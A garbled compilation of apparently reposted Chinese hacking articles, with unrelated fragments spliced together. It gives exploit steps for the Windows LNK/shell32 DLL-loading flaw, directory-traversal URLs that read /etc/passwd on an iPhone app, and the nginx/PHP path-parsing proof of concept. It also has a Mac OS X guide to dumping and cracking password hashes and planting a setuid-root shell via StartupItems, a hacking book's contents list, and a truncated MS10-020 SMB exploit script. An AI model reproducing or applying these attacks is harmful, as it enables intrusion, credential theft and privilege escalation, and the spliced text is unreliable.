1. Unzip the files in 'C: \'. Start a DbgView or paste a KD to your VM. 

2. Rename 'suckme.lnk_' to 'suckme.lnk' and let the magic do the rest of shell32.dll. 

3. Look at your logs.  

http://ivanlef0u.nibbles.fr/repo/suckme.rar 

http://www.exploit-db.com/sploits/suckme.rar 
 

Testé sous XP SP3.

kd> g 

Breakpoint 1 hit 

eax=00000001 ebx=00f5ee7c ecx=0000c666 edx=00200003 esi=00000001 edi=7c80a6e4 

eip=7ca78712 esp=00f5e9c4 ebp=00f5ec18 iopl=0         nv up ei pl nz na po nc 

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202 

SHELL32!_LoadCPLModule+0x10d: 

001b:7ca78712 ff15a0159d7c    call    dword ptr [SHELL32!_imp__LoadLibraryW (7c9d15a0)] ds:0023:7c9d15a0={kernel32!LoadLibraryW (7c80aeeb)} 

kd> dd esp 

00f5e9c4  00f5ee7c 000a27bc 00f5ee78 00000000 

00f5e9d4  00000020 00000008 00f5ee7c 00000000 

00f5e9e4  00000000 0000007b 00000000 00000000 

00f5e9f4  00200073 002000e0 0000064c 0000028c 

00f5ea04  1530000a 00000000 003a0043 0064005c 

00f5ea14  006c006c 0064002e 006c006c 006d002e 

00f5ea24  006e0061 00660069 00730065 00000074 

00f5ea34  00090608 7c92005d 00000000 00000007 

kd> db 00f5ee7c 

00f5ee7c  43 00 3a 00 5c 00 64 00-6c 00 6c 00 2e 00 64 00  C.:.\.d.l.l...d. 

00f5ee8c  6c 00 6c 00 00 00 92 7c-c8 f2 f5 00 00 17 72 02  l.l....|......r. 

00f5ee9c  4b d2 00 00 d8 f2 f5 00-8b d2 a1 7c 00 00 00 00  K..........|.... 

00f5eeac  ac 80 9d 7c 30 d8 0d 00-34 d8 0d 00 b8 d7 0d 00  ...|0...4....... 

00f5eebc  9a d2 a1 7c 30 d8 0d 00-c8 f2 f5 00 50 40 15 00  ...|0.......P@.. 

00f5eecc  50 40 15 00 00 00 00 00-b8 00 92 7c 40 b7 0c 00  P@.........|@... 

00f5eedc  a8 ef f5 00 41 00 92 7c-18 07 09 00 5d 00 92 7c  ....A..|....]..| 

00f5eeec  c8 f2 f5 00 00 ef f5 00-00 00 00 00 b8 00 92 7c  ...............| 

kd> kv 

ChildEBP RetAddr  Args to Child 

00f5ec18 7ca81a74 00f5ee7c 000a27bc 00f5f2c4 SHELL32!_LoadCPLModule+0x10d (FPO: [1,145,4]) 

00f5ee50 7ca82543 00f5ee74 000a27bc 000a27c0 SHELL32!CPL_LoadAndFindApplet+0x4a (FPO: [4,136,4]) 

00f5f294 7cb56065 000a25b4 000a27bc 000a27c0 SHELL32!CPL_FindCPLInfo+0x46 (FPO: [4,264,4]) 

00f5f2b8 7ca13714 00000082 00000000 00000104 SHELL32!CCtrlExtIconBase::_GetIconLocationW+0x7b (FPO: [5,0,0]) 

00f5f2d4 7ca1d306 000a25ac 00000082 00f5f570 SHELL32!CExtractIconBase::GetIconLocation+0x1f (FPO: [6,0,0]) 

00f5f410 7ca133b6 000dd7e0 00000082 00f5f570 SHELL32!CShellLink::GetIconLocation+0x69 (FPO: [6,68,4]) 

00f5f77c 7ca03c88 000dd7e0 00000000 0015aa00 SHELL32!_GetILIndexGivenPXIcon+0x9c (FPO: [5,208,4]) 

00f5f7a4 7ca06693 00131c60 000dd7e0 0015aa00 SHELL32!SHGetIconFromPIDL+0x90 (FPO: [5,0,4]) 

00f5fe20 7ca12db0 00131c64 0015aa00 00000000 SHELL32!CFSFolder::GetIconOf+0x24e (FPO: [4,405,4]) 

00f5fe40 7ca15e3c 00131c60 00131c64 0015aa00 SHELL32!SHGetIconFromPIDL+0x20 (FPO: [5,0,0]) 

00f5fe68 7ca03275 000f8090 0014d5b0 0014a910 SHELL32!CGetIconTask::RunInitRT+0x47 (FPO: [1,2,4]) 

00f5fe84 75f11b9a 000f8090 75f11b18 75f10000 SHELL32!CRunnableTask::Run+0x54 (FPO: [1,1,4]) 

00f5fee0 77f49598 00155658 000cb748 77f4957b BROWSEUI!CShellTaskScheduler_ThreadProc+0x111 (FPO: [1,17,0]) 

00f5fef8 7c937ac2 000cb748 7c98e440 0014cfe0 SHLWAPI!ExecuteWorkItem+0x1d (FPO: [1,0,4]) 

00f5ff40 7c937b03 77f4957b 000cb748 00000000 ntdll!RtlpWorkerCallout+0x70 (FPO: [Non-Fpo]) 

00f5ff60 7c937bc5 00000000 000cb748 0014cfe0 ntdll!RtlpExecuteWorkerRequest+0x1a (FPO: [3,0,0]) 

00f5ff74 7c937b9c 7c937ae9 00000000 000cb748 ntdll!RtlpApcCallout+0x11 (FPO: [4,0,0]) 

00f5ffb4 7c80b729 00000000 00edfce4 00edfce8 ntdll!RtlpWorkerThread+0x87 (FPO: [1,7,0]) 

00f5ffec 00000000 7c920250 00000000 00000000 kernel32!BaseThreadSta 

前言
windows的shell32在处理控制面板程序的快捷方式文件时，存在一个漏洞，可以加载硬盘上的任意DLL文件，即可执行任意代码。

漏洞文件的生成
到“控制面板”下面，右键点“显示”，点“创建快捷方式”，把快捷方式创建在桌面上。然后在桌面用WinHex打开“显示.lnk”文件。

并通过wifi分享这些文件，详细的介绍看这：http://itunes.apple.com/us/app/discover/id292416855?mt=8#

漏洞分析

当wifi环境下的iphone/ipod touch用户打开discover时，会自动开启远程web访问，web界面是flash制作的文件管理界面（如下图），discover有两种目录：Private与Public，在“设置”-->“文件安全设置”中可以设置web访问密码（认证类型为HTTP Digest），不过仅保护Private目录。

由于discover web服务的一些api接口没有严格认证用户访问并且存在目录穿越漏洞，导致攻击者利用这些web服务api可以访问iphone/ipod（mobile用户权限）上的任意目录与文件，并且可以删除mobile权限可删除的文件。
文章转载自：神秘小强'S blog http://www.smxiaoqiang.cn/

漏洞利用

1、首先我们来列目录：
http://192.168.1.9:8888/list?sort=%27&format=xml&dir=/Public/../../../../../../../etc/&order=asc

2、读文件内容，虽然我知道我们的权限仅仅是mobile，但是读的权限还是很广的：
http://192.168.1.9:8888/web?path=history/../../../../../../../../etc/passwd

还有一个delete api: http://192.168.1.9:8888/delete?path=/Private/&format=none

漏洞厂商

http://www.mappn.com/community/

                                                                        //神秘小强's blog

看右下角都安装了啥。

漏洞分析：nginx默认以cgi的方式支持php的运行，譬如在配置文件当中可以以

www.smxiaoqiang.cn
location ~ \.php$ {
root html;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
include fastcgi_params;
}

的方式支持对php的解析，location对请求进行选择的时候会使用URI环境变量进行选择，其中传递到后端Fastcgi的关键变量SCRIPT_FILENAME由nginx生成的$fastcgi_script_name决定，而通过分析可以看到$fastcgi_script_name是直接由URI环境变量控制的，这里就是产生问题的点。而为了较好的支持PATH_INFO的提取，在PHP的配置选项里存在cgi.fix_pathinfo选项，其目的是为了从SCRIPT_FILENAME里取出真正的脚本名。
那么假设存在一个http://www.80sec.com/80sec.jpg，我们以如下的方式去访问

将会得到一个URI

/80sec.jpg/80sec.php

经过location指令，该请求将会交给后端的fastcgi处理，nginx为其设置环境变量SCRIPT_FILENAME，内容为

/scripts/80sec.jpg/80sec.php

而在其他的webserver如lighttpd当中，我们发现其中的SCRIPT_FILENAME被正确的设置为

/scripts/80sec.jpg

所以不存在此问题。
后端的fastcgi在接受到该选项时，会根据fix_pathinfo配置决定是否对SCRIPT_FILENAME进行额外的处理，一般情况下如果不对fix_pathinfo进行设置将影响使用PATH_INFO进行路由选择的应用，所以该选项一般配置开启。Php通过该选项之后将查找其中真正的脚本文件名字，查找的方式也是查看文件是否存在，这个时候将分离出SCRIPT_FILENAME和PATH_INFO分别为

/scripts/80sec.jpg和80sec.php

最后，以/scripts/80sec.jpg作为此次请求需要执行的脚本，攻击者就可以实现让nginx以php来解析任何类型的文件了。

http://www.80sec.com/80sec.jpg/80sec.php

POC： 访问一个nginx来支持php的站点，在一个任何资源的文件如robots.txt后面加上/80sec.php，这个时候你可以看到如下的区别：

访问http://www.80sec.com/robots.txt

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:05:30 GMT
Content-Type: text/plain
Content-Length: 18
Last-Modified: Thu, 20 May 2010 06:26:34 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes

访问访问http://www.80sec.com/robots.txt/80sec.php

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:06:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.6

其中的Content-Type的变化说明了后端负责解析的变化，该站点就可能存在漏洞。

漏洞厂商：http://www.nginx.org

解决方案：

我们已经尝试联系官方，但是此前你可以通过以下的方式来减少损失

关闭cgi.fix_pathinfo为0

或者

if ( $fastcgi_script_name ~ \..*\/.*php ) {
return 403;
}


本文从提升权限漏洞的一系列巧妙的方法来绕过受保护的Mac OS X。有些已经被处于底层控制，但由于它们存在着更多的认证和修补程序，我们不妨让这些提供出来，以便需要的人学习它们。虽然我不只是要利用脚本，而且之后我将解释可以做哪些事情，让你利用这些技巧能够充分地进行研究。

- 破解用户密码
- 通过Root读取/usr/bin/at文件
- 敏感交换文件
- 欺骗软件更新
- 恢复开发固件密码
- 恶意启动项目的利用
- URL处理程序漏洞利用
- 尾声

破解用户密码
~~~~~~~~~~~~~~~~

在过去的日子里你只需执行“nidump passwd”，并获得所有用户密码加密的一个DES清单。还有几种方法可以恢复用户密码，Mac OS X在/etc/shadow或/etc/master密码文件中不存储密码。但是，有一种方法可以恢复所有用户的密码哈希。

Mac OS X使用NetInfo处理用户账户。该密码哈希存储在/var/db/shadow/hash/(guid)。每个用户都有自己的哈希文件，要获得一个用户清单及其相应产生的uid(guid)，尝试：
local: user$ nireport / /users name generateduid uid | grep -v NoValue
admin 559DBF44-4231-11D9-A5A8-00039367EBAE 501
orb 5D97A400-5045-11D9-AFEB-00039367EBAE 502
test C82D45B7-6422-11D9-853D-00039367EBAE 503

因此，“admin”用户的密码存储在/var/db/shadow/hash/559DBF44-4231-11D9-A5A8-00039367EBAE.
现在可以作为Root只读这个文件，当然，我们也有一些窍门可以尝试，让你阅读这些文件。但是，首先要说的是你目前已拥有Root权限。
 # cat /var/db/shadow/hash/559DBF44-4231-11D9-A5A8
 00039367EBAE 209C6174DA490CAEB422F3FA5A7AE634F0D412BD764FFE81AAD3B435B5
1404EED033E22AE348AEB5660FC2140AEC35850C4DA997

这个巨长的字符串包含两个相同的密码哈希。第一个64个字符组成的SMB散列（这是Windows使用的文件共享，即使没有打开）这实际上是放在一起的两个32个字符的MD4散列。
最后40个字符组成了SHA1哈希。你一旦恢复这个文件，所有剩下的工作就是正确地格式化这个文件并通过Ripper或Lepton's Crack进行破解。

SMB 哈希:
admin:209C6174DA490CAEB422F3FA5A7AE634:F0D412BD764FFE81AAD3B435B51404EE
orb:6FFB224FB592476B2230862E220937DA:4B881A967FE694FBAAD3B435B51404EE
test:0CB6948805F797BF2A82807973B89537:01FC5A6BE7BC6929AAD B435B51404EE

SHA1 哈希:
admin:D033E22AE348AEB5660FC2140AEC35850C4DA997
orb:23119F5947DA61A815E7A1CC2AF9BDB8C19CAF1F
test:A94A8FE5CCB19BA61C4C0873D391E987982FBBD3

通过Root读取/usr/bin/at
~~~~~~~~~~~~~~~~~~~~~~~~~~~
这个允许你作为root身份读取/usr/bin/at并分析存在的漏洞。使用这一招，你可以阅读各种敏感文件，包括用户密码哈希、临时交换文件、.bash_history文件等。

这将允许你读取由“admin”用户所执行的命令列表：
local: user$ id
uid=503(test) gid=503(test) groups=503(test)
local: user$ ls -al /users/admin/.bash_history
-rw------- 1 admin staff 1259 12 Apr 2010 /users/admin/. bash_history
local: user$ cat /users/admin/.bash_history cat: /users/admin/.bash_history:
Permission denied
local: user$ at -f /users/admin/.bash_history now+1minute
czy a011afa33.000 will be executed using /bin/sh
local: user$ cat /var/at/jobs/a011afa33.000

只要你有权使用本地机器，你可以阅读所有文件的哈希值：
at -f /var/db/shadow/hash/559DBF44-4231-11D9A5A8-00039367EBAE now+1minute

敏感的交换文件
~~~~~~~~~~~~~~~~
还有另一种方法就是，使用临时交换文件恢复密码。包括FileVault、Keychain、login和其它存储在/var/vm/各种敏感数据交换文件，这些文件很大，它需要一些聪明的Unix命令才能够提取其中有用的东西。然而，很多时候用户名和密码以纯文本方式存储。

尝试一下你自己的机器（核实swapfile1、swap-file2等）。

# strings -8 /var/vm/swapfile0 | grep -A 4 -i longname

每次机器重启之后，这些交换文件将被清除。

当然，这些文件只能由root读取。你可以使用“at”漏洞，将这些交换文件复制到临时位置，然后使用上面的命令来解析这些文件。

欺骗软件更新
~~~~~~~~~~~~~~~~
Mac OS X有一个方便的工具，可以对安全更新软件和软件补丁进行自动检查更新。如果你有机会获得一台机器，你可以利用这种方式进行欺骗，以为你已经安装了特定的软件更新和补丁。

检查/Library/Receipts/目录，创建一个与其中一个更新包和软件更新相同名字的文件，以替代它。

恢复开放固件密码
~~~~~~~~~~~~~~~~~~~
许多公共计算机，特别是商业网（网吧），使用特殊的安全软件或跟踪装置以阻止你的一些活动，甚至要求你按小时支付。通常，你可以重启计算机进入开放固件并使用系统的单用户模式，要么仅仅启动到一个外部设备，例如，将Mac OS X复制并安装在你的Mp3或Mp4设备里面。不幸的是，越来越多的计算机都有了开放固件密码的保护措施，这需要你首先验证所做的这些事情。

如果你拥有root权限访问终端，请尝试输入nvram安全密码。这应该显示出一个字符串，即开放固件密码的异十六进制编码。这不是加密的，它只是模糊处理。

nvram security-password
security-password: %d9%df%da%cf%d8%d9%cf%c1%d8%cf%de
本文转载自： http://www.smxiaoqiang.cn

密歇根大学MacSIG小组编写一个C脚本，能够生成字符串作为使用开放固件的密码：
http://macosx.si.umich.edu/files/ofpwgen.c

使用这个你应该能够通过字符串匹配的nvram security-password从而找到密码。你也可以使用下面内容作为参考：

nvram security-password
a  b  c  d  e  f  g  h  i  j  k  l  m
%cb%c8%c9%ce%cf%cc%cd%c2%c3%c0%c1%c6%c7

n  o  p  q  r  s  t  u  v  w  x  y  z
%c4%c5%da%db%d8%d9%de%df%dc%dd%d2%d3%d0

A  B  C  D  E  F  G  H  I  J  K  L  M
%eb%e8%e9%ee%ef%ec%ed%e2%e3%e0%e1%e6%e7

N  O  P  Q  R  S  T  U  V  W  X  Y  Z 
%e4%e5%fa%fb%f8%f9%fe%ff%fc%fd%f2%f3%f0

1  2  3  4  5  6  7  8  9  0  !  @  #
%9b%98%99%9e%9f%9c%9d%92%93%9a%8b%ea%89

$  %  ^  &  *  (  )  +  =  -  _  }  { 
%8e%8f%f4%8c%80%82%83%81%97%87%f5%d7%d1

当你用这个密码，你就可以启动到单用户模式或重启到你自己的MP3/MP4上存储的操作系统。

恶意启动项目的利用
~~~~~~~~~~~~~~~~~~~~~
如果/Library/StartupItems目录没有被创建，对于某些软件则需要创建它，以便机器重启时能够运行程序。这些脚本由root运行。往往写得不好的软件在安装时将创建到此目录中，并允许任何用户使用该目录中的文件。人们可以编写一个恶意脚本，删除该目录，重启计算机，并能够以root身份执行脚本。

ls -al /Library/StartupItems/
total 0
drwxrwxrwx 3  root admin 102  25 Apr 12:15 .
drwxrwxr-x 39 root admin 1326 26 Apr 09:28 ..

如你所见，该目录的模式是chmod 777 ——这意味着我们可以对它写入文件。在此目录中，写一个相同名称的shell脚本作为目录所包含的文本：

#!/bin/sh
cp /bin/sh /etc/.rewt
chown root /etc/.rewt
chmod 4755 /etc/.rewt

然后，访问的StartupParameters.plist所包含的文本如下：
{
 Description = "NameOfScript";
 Provides = ("NameOfScript");
 OrderPreference = "None";
}

下次重启机器，它会执行你写好的shell脚本。这个特殊的脚本将在/etc/.rewt里面建立一个suid root。

URL处理程序漏洞利用
~~~~~~~~~~~~~~~~~~~~~~
有一些Mac OS X安全问题与URL处理有关。
通过这些技巧，你能够在受害者机器中执行代码，加载任何Web链接。
其基本思路是引诱用户下载并安装一个DMG文件，然后尝试运行DMG文件中存储的代码。

你可以编写一个HTML文件，通过Javascript或一个meta刷新标记自动重定向到一个特定的URL。

DMG文件内容可以包含一个特制的应用程序调用Fun.app，它可以自动打开一个新的URL处理程序。

其它有趣的还有：x-man-page://、telnet://、ssh://、ical://、addressbook://、itms://、mms://等等。

尾声
~~~~~~~
本文上述的利用方案并不是所有，包括过去数年的漏洞攻击并没有提及到。如果你需要针对的是远程系统执行入侵任务，那么，你需要更多的思路进行研究，它也存在着更多的灵活性和窍门可以提供我们应用，我们需要积极地发掘它们。对于它仍有其它疑问，请写信件发送至我的Email（Hack01[at]Live.cn）。

# HACKER NETSPY [CZY]

这个功能对企业相当不错，简单来讲就是可以通过这个技术来远程管理和修复联网的计算机系统，因为 Intel AMT 是自动执行一个独立于操作系统的子系统，正是由于有了独立于操作系统的环境，使得在操作系统出现故障的时候，管理员能够在远程监视和管理客户端。通过这项原本专属于服务器应用领域的技术，未来的个人电脑将可以在操作系统损毁或系统出现故障的时候进行远程管理和检测系统，或是系统发生错误时主动发出警告信息，进行软硬件检查、远端更新BIOS、病毒码及操作系统，甚至在系统关机的时候，也可以通过网络进行管理工作，对企业用户而言，可大幅降低管理成本。

使用时有几点要注意:

1. 如果使用动态 IP 网络 (DHCP)，则 Intel AMT 主机名与操作系统主机名必须匹配。此外，还必须配置操作系统和 Intel AMT 的DHCP。

2. 如果使用静态 IP 网络，则 Intel AMT IP 地址不得与操作系统 IP 地址相同。此外， Intel AMT 主机名也不得与操作系统主机名相同。

3. 默认的密码为 admin 第一次进入时会让你使用新的密码，新的密码要有特别的符号，字母大小写，数字都要有。

4. X200 是使用 F12 进入进行 AMT 的设置。打开 Web Gui 的地址是 http://IP:16992

下面有个详细的设置，是 DELL 的不过 ThinkPad 的设置内容和这个的一样。

http://supportapj.dell.com/support/edocs/systems/xlob/iAMT/cs/index.htm

http://pcbbs.enet.com.cn/thread-5814-1-1.html
 

状态：上市                  
简介：

        本书是一本windows平台下渗透技术的入门书籍，作为一本计算机爱好者深入浅出的书籍，门槛低，所以称之为入门书籍。现在，作为渗透攻防入门书籍并不是很多，即便有了，书上内容所使用的工具也有所过时，本书牵涉到的漏洞以及工具实用性非常强。

为了给予读者朋友更好的知识盛宴，笔者尝试着囊括近几年来最流行的攻击手法。但是技术永远是进步的，很多东西还是需要读者自己去挖掘，但这本书足以概括了攻击层次的大体知识，也不乏很多新鲜技巧。读者朋友们无需掌握许多乏味的基础知识以及基本概念即可掌握该书的绝大部分内容，笔者会从实战的角度来对枯燥的理论知识释疑，引领大家走完这本书的征程。

●涉及内容：                    
      网络基础知识、信息收集、缓冲区溢出知识、拒绝服务、数据库攻防、 Web漏洞发掘、内网渗透、后门技术等                 
                  
●适合读者：                     
1、对渗透攻防技术感兴趣的朋友                                    
2、网络爱好者                                        
3、网管人员                                       
4、想拓展安全知识的技术相关人员

●序：

静谧夜空，星满苍穹，广袤大地被月光擦拭得那样清澈，散发着童话般的馨香。如此美的夜，充满着浪漫和陶醉，可在黑客技术旅者的眼中，却是那样朴素而平常。

萤火 学海无涯苦坐舟

草长莺飞的旷野，他们像是坠落草原的星辰，简约沉默，却在寒夜中闪烁着坚强的光。是萤火虫，抑或是我？同样的苦旅，相似的激情，狂热地燃烧自己的生命，点滴耗尽，为成就理想和真实之约而顽强殉道，断不言悔。

萤火虫，就是黑客的憧憬与痴愿之灵。

精灵 玉楼明月长相忆

用盛开的清秀染绿古道清泉，让似火的霓裳绽放山涧寂静。有时，会化作一抹嫣然的绿，为寒冬打开温暖的希望，抑或，曾经是一方淡雅红叶，飘进晚秋的深邃。激情时，似盛夏清风，拥柔裹香飞抵万里云天。忧伤处，是婉约古城，秀美惟存，却从此冷漠沉寂。

正因是如此幻美，黑客技术才若精灵般散发着致命的诱惑，为身后万千萤火苦苦追求。

书卷 千呼万唤始出来

万千承载，凝结一部书卷。也许它不是开启精灵少女心扉的钥匙，或许也不能令技术古城之旅温馨坦途，甚或，会让你从此就在兰菊落英中怅然悟道。然而，它在萤火虫瞬息的生命里，却为通向对技术执着的痴爱时空架起了一座伟岸的浮桥。

萤火书卷——技术与狂热的基线，让我们的精灵爱旅，从这里开始。

                                                            此致

苦夜共勉

[E.S.T]冰血封情

庚寅年正月三十黄昏题于洛辰小筑亦岚轩

●封面(很多人说封面很邪恶，但是我没办法啊！........)：

目录：

第一章 黑客必备基础知识

1.1  渗透前述

1.1.1 木马分类小述

1.1.2 区分内网和外网

1.1.3 代理技术概述

1.1.4 熟悉跳板代理

1.1.5 Windows权限

1.1.6 通过手工添加系统服务

1.2　常用网络命令概述

1.2.1 ping命令

1.2.2 net及netstat命令

1.2.3 telnet及ftp命令

1.2.4 tracert命令

1.2.5 Echo命令

1.2.6 ipconfig命令

1.2.7 arp命令

第二章 入侵前的信息收集

2.1 网站信息收集

2.1.1 google基本语法及利用

2.1.2 google搜索信息及渗透攻击实例

2.1.3 网站目录结构探测

2.2  服务器信息收集

2.2.1 常见端口和服务探测

2.2.2 Nmap应用及实例

2.2.3 常见弱口令类型

2.2.4 模拟Tomcat弱口令攻击

2.2.5 模拟HScan对FTP弱口令攻击

第三章 轻松掌握缓冲区溢出攻击

3.1 浅析缓冲区溢出漏洞

3.1.1 初识shellcode及exploit

3.1.2 如何编译Exploit程序

3.1.3 远程及本地溢出

3.1.4 国外最著名的入侵工具Metaspolit

第四章 傻瓜式的拒绝服务攻击技术

4.1 拒绝服务攻击概述

4.1.1 什么是拒绝服务

4.1.2 拒绝服务攻击者的动机

4.2 分布式拒绝服务攻击概述

4.2.1 DDoS的攻击原理

4.2.2 DDoS攻击的类型

4.2.3 DoS和DDoS有什么区别

4.3 基于页面的DDoS——CC攻击

4.3.1 什么是CC攻击

4.3.2 CC攻击与DDoS攻击的区别

4.4 CC攻击实例

4.4.1 获取大量的代理服务器

4.4.2 验证代理的有效性

4.4.3 开始CC攻击

4.5 使用WAS对网站进行压力测试

第五章 网站攻击基础

5.1 Web渗透概述

5.2 Web常见的攻击方式

5.3   Web服务器出错消息分析

5.3.1　Http基础

5.3.2　出错分析

5.4  数据库概述

5.4.1 SQL2000的安装

5.4.2 MySQL5.x安装

5.4.3 oracle 10g安装

5.5 SQL语言基础

5.5.1 SQL创建数据表

5.5.2 SQL数据查询

5.5.3 SQL数据插入

5.5.4 SQL数据更新

5.5.5 SQL数据删除

5.6 SQL数据库注入

5.6.1 SQL数据库注入原理篇

5.6.2 注入渗透利器

5.7 攻击Access数据库

5.7.1 Access暴库

5.7.2　暴库的防范

5.7.3　Access数据库其他软肋

5.8 熟悉mssql2000中的权限

5.9 Asp+Access数据库注入流程
 

第六章 数据库渗透技巧

6.1 后台高级webshell获取技巧

6.2　入侵实例应用

6.2.1　图片备份

6.2.2　NC上传提交

6.2.3　后台网站配置

6.3　攻击SQL Server数据库

6.3.1 高级SA权限攻击技巧及实例

6.3.2 网站绝对路径获取技巧

6.3.3 SA权限下的webshell获取技巧

6.3.4 基于db_owner权限的webshell获取

6.3.5 启动项隐患

6.3.6 伪造注入点渗透

6.3.7 group By及Having操作符

6.3.8  反弹注入

6.3.9   public权限下的渗透思路

6.4 攻击mysql数据库

6.4.1 order by及unoin select操作符

6.4.2 concat_ws()函数

6.4.3 php+mysql注入

6.4.4 mysql5.0注入技巧

6.4.5 phpmyadmin下webshell获取技巧

6.4.6　绕过防注入

6.4.7　实战php注入攻击

6.4.8 不容小觑的install和setup目录

6.5 Mysql提权技巧

6.5.1 mix.dll和udf.dll权限提升

6.5.2 Mysql BackDoor权限提升

6.5.3 mysql其它的技巧

6.6 攻击oracle数据库

6.6.1 Oracle 9i弱口令渗透韩国肉鸡

6.6.2 Oracle注入实战

6.6.3 UTL_HTTP反弹注入实例

第七章 Web常见漏洞大观

7.1 IIS漏洞

7.1.1 IIS写权限漏洞利用

7.1.2 IIS6.0文件名解析漏洞

7.1.3 IIS6.0漏洞结合CMS利用技巧

7.2 Web常见编辑器漏洞

7.2.1 Ewebeditor漏洞小述

7.2.2 实战ewebeditor的jsp版

7.2.3 Cuteeditor漏洞小结

7.2.4 fckeditor终极利用

7.3 Apache漏洞

7.4 Tomcat漏洞

7.5 Asp常见漏洞解析

7.5.1 ASP注入漏洞

7.5.2   Cookies欺骗漏洞分析及利用

7.5.3 上传漏洞小述

7.5.4 XSS漏洞

7.5.5 程序漏洞分析举例

7.5.6 程序漏洞分析举例二

7.6 Php常见漏洞解析

7.6.1 php中的注入

7.6.2 PHP上传漏洞

7.6.3 远程/本地文件包含漏洞

7.7 Jsp常见漏洞解析

7.7.1 Jdk+Tomcat环境的搭建

7.7.2 Jsp注入漏洞

7.7.3 实践上传漏洞

7.7.4 后台权限验证漏洞

第八章 终极较量之系统提权

8.1 提权前的信息初探

8.2 计算机的环境变量提权

8.3 提权中的文件传输

8.4 如何开启3389远程终端服务

8.5 替换服务提权

8.6 Serv-U提权技术

8.7 剖析G6ftp提权

8.8 Flashfxp和leapftp的提权

8.9 pcAnywhere提权技巧

8.10 Radmin提权

8.11 VNC提权技巧

8.12 NetBox和Magic Winmail的提权

8.13 禁用NET程序的提权

8.14 CMD程序保护的提权

8.15 提权实例演示

第九章 让黑客无形的后门技术

9.1 系统日志的清除

9.1.1 手工清除日志

9.1.2 工具清除日志

9.2 后门技术概述

9.2.1 命令行后门

9.2.2 帐号后门

9.2.3 高级Rootkit隐匿帐号技术

9.3 服务后门

9.4 木马程序后门

9.5 密码截取

9.5.1 终端密码的获取——WinlogonHack的应用

9.5.2 其它密码记录工具

9.6 默认热键后门

9.6.1 粘滞键后门

9.6.2 放大镜后门

9.7 web下的后门

9.7.1 shell下的常用组件

9.7.2 web木马隐藏技巧

9.7.3 web木马躲过杀软

第十章 内网入侵全接触

10.1 了解计算机工作组和域

10.1.1 熟悉网络拓扑

10.1.2 Hash值的破解

10.2 端口转发原理及实例

10.3 reDuh应用技巧

10.4 内网不能忽视的经典IPC$

10.5 SocksCap内网渗透技术

10.6 内网渗透实例
 

# Windows 7/2008R2 SMB Client Trans2 stack overflow (MS10-020)
# Date: 17/04/10
# Author: Laurent Gaffié
# Tested on: Windows 7/2008R2
# CVE: CVE-2010-0270

EBP = "\x42\x42\x42\x42"
EIP = "\x41\x41\x41\x41"

packetnego = (
"\x00\x00\x00\x55"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x98\x53\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00"
"\x11\x05\x00\x03\x0a\x00\x01\x00\x04\x11\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\xfd\xe3\x00\x80\x1a\x49\xf9\x22\xfb\x86\xca\x01"
"\x88\xff\x00\x10\x00\xf0\xe4\x54\xc4\x50\x6c\xb2\x4a\xb9\x3a\x6b"
"\xcf\xb0\x8c\x8d\xaf"
)

packetsession = (
"\x00\x00\x01\x3d"
"\xff\x53\x4d\x42\x73\x16\x00\x00\xc0\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe\x00\x08\x10\x00"
"\x04\xff\x00\x3d\x01\x00\x00\xc8\x00\x12\x01\x4e\x54\x4c\x4d\x53"
"\x53\x50\x00\x02\x00\x00\x00\x0c\x00\x0c\x00\x38\x00\x00\x00\x15"
"\x82\x8a\xe2\x16\x7a\x68\x5f\xc6\x0c\x78\xd8\x00\x00\x00\x00\x00"
"\x00\x00\x00\x84\x00\x84\x00\x44\x00\x00\x00\x05\x01\x28\x0a\x00"
"\x00\x00\x0f\x46\x00\x55\x00\x43\x00\x4b\x00\x55\x00\x32\x00\x02"
"\x00\x0c\x00\x46\x00\x55\x00\x43\x00\x4b\x00\x55\x00\x32\x00\x01"
"\x00\x0c\x00\x46\x00\x55\x00\x43\x00\x4b\x00\x55\x00\x32\x00\x04"
"\x00\x22\x00\x66\x00\x75\x00\x63\x00\x6b\x00\x75\x00\x32\x00\x2e"
"\x00\x74\x00\x65\x00\x73\x00\x74\x00\x2e\x00\x6c\x00\x6f\x00\x63"
"\x00\x61\x00\x6c\x00\x03\x00\x22\x00\x66\x00\x75\x00\x63\x00\x6b"
"\x00\x75\x00\x32\x00\x2e\x00\x74\x00\x65\x00\x73\x00\x74\x00\x2e"
"\x00\x6c\x00\x6f\x00\x63\x00\x61\x00\x6c\x00\x06\x00\x04\x00\x01"
"\x00\x00\x00\x07\x00\x08\x00\xe8\x62\xc8\x16\xfb\x86\xca\x01\x00"
"\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00"
"\x73\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x57\x00\x69\x00"
"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00"
"\x30\x00\x30\x00\x20\x00\x4c\x00\x41\x00\x4e\x00\x20\x00\x4d\x00"
"\x61\x00\x6e\x00\x61\x00\x67\x00\x65\x00\x72\x00\x00"
)

packetsession2 = (
"\x00\x00\x00\x75"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe\x00\x08\x20\x00"
"\x04\xff\x00\x75\x00\x01\x00\x00\x00\x4a\x00\x00\x57\x00\x69\x00"
"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x35\x00\x2e\x00"
"\x31\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00"
"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x4c\x00"
